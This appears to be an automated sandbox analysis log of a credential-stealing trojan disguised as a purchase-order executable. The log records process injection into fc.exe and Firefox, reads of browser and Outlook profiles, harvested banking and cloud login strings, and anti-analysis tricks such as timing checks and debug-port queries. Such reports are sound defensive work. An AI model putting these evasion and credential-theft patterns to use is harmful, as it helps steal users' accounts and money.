              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_039616CC4_2_039616CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038F56304_2_038F5630
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0394D5B04_2_0394D5B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_039675714_2_03967571
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396F43F4_2_0396F43F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038A14604_2_038A1460
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038CFB804_2_038CFB80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03925BF04_2_03925BF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038EDBF94_2_038EDBF9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396FB764_2_0396FB76
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038F5AA04_2_038F5AA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03951AA34_2_03951AA3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0394DAAC4_2_0394DAAC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0395DAC64_2_0395DAC6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03967A464_2_03967A46
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396FA494_2_0396FA49
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03923A6C4_2_03923A6C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_039459104_2_03945910
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B99504_2_038B9950
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038CB9504_2_038CB950
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B38E04_2_038B38E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0391D8004_2_0391D800
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B1F924_2_038B1F92
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396FFB14_2_0396FFB1
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03873FD54_2_03873FD5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03873FD24_2_03873FD2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396FF094_2_0396FF09
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B9EB04_2_038B9EB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038CFDC04_2_038CFDC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B3D404_2_038B3D40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03961D5A4_2_03961D5A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03967D734_2_03967D73
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396FCF24_2_0396FCF2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03929C324_2_03929C32
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030D1FD04_2_030D1FD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030CCE804_2_030CCE80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030CB1C44_2_030CB1C4
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030CB1D04_2_030CB1D0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030C11E74_2_030C11E7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030CB07F4_2_030CB07F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030CB0804_2_030CB080
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030CD0A04_2_030CD0A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030D56804_2_030D5680
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030D387B4_2_030D387B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030D38804_2_030D3880
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030EBCD04_2_030EBCD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371E2F54_2_0371E2F5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371E7B34_2_0371E7B3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371E57B4_2_0371E57B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371E4134_2_0371E413
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371CB134_2_0371CB13
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371D8784_2_0371D878
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 0392F290 appears 105 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 038F7E54 appears 103 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 0389B970 appears 280 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 0391EA12 appears 86 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 038E5130 appears 58 times
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: String function: 0101F290 appears 105 times
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: String function: 00F8B970 appears 280 times
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: String function: 0100EA12 appears 86 times
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: String function: 00FD5130 appears 58 times
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: String function: 00FE7E54 appears 102 times
              Source: PO No. 0146850827805 HSP00598420.exeStatic PE information: No import functions for PE file found
              Source: PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2326927222.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO No. 0146850827805 HSP00598420.exe
              Source: PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2324389294.0000000000C38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO No. 0146850827805 HSP00598420.exe
              Source: PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2417757352.0000000000A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs PO No. 0146850827805 HSP00598420.exe
              Source: PO No. 0146850827805 HSP00598420.exe, 00000000.00000002.2418789448.0000000001231000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO No. 0146850827805 HSP00598420.exe
              Source: PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2417757352.0000000000A1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs PO No. 0146850827805 HSP00598420.exe
              Source: PO No. 0146850827805 HSP00598420.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: PO No. 0146850827805 HSP00598420.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: PO No. 0146850827805 HSP00598420.exeStatic PE information: Section .text
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@11/7
              Source: C:\Windows\SysWOW64\fc.exeFile created: C:\Users\user\AppData\Local\Temp\17O3k-2IJump to behavior
              Source: PO No. 0146850827805 HSP00598420.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: fc.exe, 00000004.00000002.3919628546.00000000033F5000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3919628546.00000000033F2000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000003.2601065883.00000000033F5000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000003.2601065883.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3919628546.00000000033DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: PO No. 0146850827805 HSP00598420.exeVirustotal: Detection: 69%
              Source: PO No. 0146850827805 HSP00598420.exeReversingLabs: Detection: 68%
              Source: unknownProcess created: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exe "C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exe"
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
              Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: PO No. 0146850827805 HSP00598420.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: fc.pdb source: PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2417757352.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fc.pdbGCTL source: PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2417757352.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DlLArodfwUXcDj.exe, 00000003.00000002.3919488077.00000000003FE000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2326927222.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000002.2418789448.00000000010FE000.00000040.00001000.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2324389294.0000000000B15000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3920347727.0000000003A0E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.2420588892.00000000036C9000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3920347727.0000000003870000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.2418064008.0000000003518000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: PO No. 0146850827805 HSP00598420.exe, PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2326927222.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000002.2418789448.00000000010FE000.00000040.00001000.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2324389294.0000000000B15000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000004.00000002.3920347727.0000000003A0E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.2420588892.00000000036C9000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3920347727.0000000003870000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.2418064008.0000000003518000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F290BB pushad ; iretd 0_2_00F290E4
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F23863 push ss; iretd 0_2_00F23880
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F13490 push eax; ret 0_2_00F13492
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F24DC4 pushfd ; retf 0_2_00F24DCE
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F909AD push ecx; mov dword ptr [esp], ecx0_2_00F909B6
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_084888D1 push cs; retf 3_2_084888DA
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_084829C0 push 1537E110h; ret 3_2_084829C8
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_0847F1F1 pushfd ; retf 3_2_0847F1FB
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_0848924E push FFFFFFADh; ret 3_2_08489250
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_08489429 push ecx; ret 3_2_0848942A
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_084834E8 pushad ; iretd 3_2_08483511
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_084745A4 pushad ; ret 3_2_084745A5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0387225F pushad ; ret 4_2_038727F9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038727FA pushad ; ret 4_2_038727F9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038A09AD push ecx; mov dword ptr [esp], ecx4_2_038A09B6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0387283D push eax; iretd 4_2_03872858
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03871368 push eax; iretd 4_2_03871369
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030DB011 push cs; retf 4_2_030DB01A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030DBB69 push ecx; ret 4_2_030DBB6A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030D1931 pushfd ; retf 4_2_030D193B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030DB98E push FFFFFFADh; ret 4_2_030DB990
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030DDD8B push eax; iretd 4_2_030DDDEC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030D5C28 pushad ; iretd 4_2_030D5C51
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371B3C4 push edi; ret 4_2_0371B445
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371B3C8 push edi; ret 4_2_0371B445
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03725202 push eax; ret 4_2_03725204
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037171EA push es; ret 4_2_037171EB
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371C033 push ss; iretd 4_2_0371C036
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371BA5F push cs; retf 4_2_0371BA67
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371AE60 push ds; retf 4_2_0371AE61
              Source: PO No. 0146850827805 HSP00598420.exeStatic PE information: section name: .text entropy: 7.99527207662154
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Switches to a custom stack to bypass stack traces
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD096E rdtsc 0_2_00FD096E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeAPI coverage: 0.7 %
              Source: C:\Windows\SysWOW64\fc.exeAPI coverage: 2.7 %
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe TID: 1292Thread sleep time: -50000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe TID: 1292Thread sleep time: -34500s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\fc.exe TID: 6592Thread sleep count: 42 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exe TID: 6592Thread sleep time: -84000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030DC870 FindFirstFileW,FindNextFileW,FindClose,4_2_030DC870
              Source: 17O3k-2I.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: fc.exe, 00000004.00000002.3922611769.00000000082E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: payments_upi_vpadVMware
              Source: 17O3k-2I.4.drBinary or memory string: discord.comVMware20,11696428655f
              Source: 17O3k-2I.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: 17O3k-2I.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: 17O3k-2I.4.drBinary or memory string: global block list test formVMware20,11696428655
              Source: fc.exe, 00000004.00000002.3922611769.00000000082E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,
              Source: 17O3k-2I.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: 17O3k-2I.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: fc.exe, 00000004.00000002.3919628546.0000000003320000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz Z
              Source: 17O3k-2I.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: 17O3k-2I.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: 17O3k-2I.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: 17O3k-2I.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: 17O3k-2I.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: 17O3k-2I.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: 17O3k-2I.4.drBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: 17O3k-2I.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: DlLArodfwUXcDj.exe, 00000003.00000002.3920081062.000000000114E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: 17O3k-2I.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: 17O3k-2I.4.drBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: 17O3k-2I.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: 17O3k-2I.4.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: 17O3k-2I.4.drBinary or memory string: AMC password management pageVMware20,11696428655
              Source: 17O3k-2I.4.drBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: 17O3k-2I.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: 17O3k-2I.4.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: 17O3k-2I.4.drBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: 17O3k-2I.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: 17O3k-2I.4.drBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: 17O3k-2I.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: 17O3k-2I.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: 17O3k-2I.4.drBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: fc.exe, 00000004.00000002.3922611769.00000000082E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dVMware
              Source: 17O3k-2I.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: firefox.exe, 00000006.00000002.2711215552.0000021BB932C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll==:
              Source: 17O3k-2I.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD096E rdtsc 0_2_00FD096E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F27CA3 LdrLoadDll,0_2_00F27CA3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8C0F0 mov eax, dword ptr fs:[00000030h]0_2_00F8C0F0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD20F0 mov ecx, dword ptr fs:[00000030h]0_2_00FD20F0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103E10E mov eax, dword ptr fs:[00000030h]0_2_0103E10E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103E10E mov ecx, dword ptr fs:[00000030h]0_2_0103E10E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103E10E mov eax, dword ptr fs:[00000030h]0_2_0103E10E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103E10E mov eax, dword ptr fs:[00000030h]0_2_0103E10E
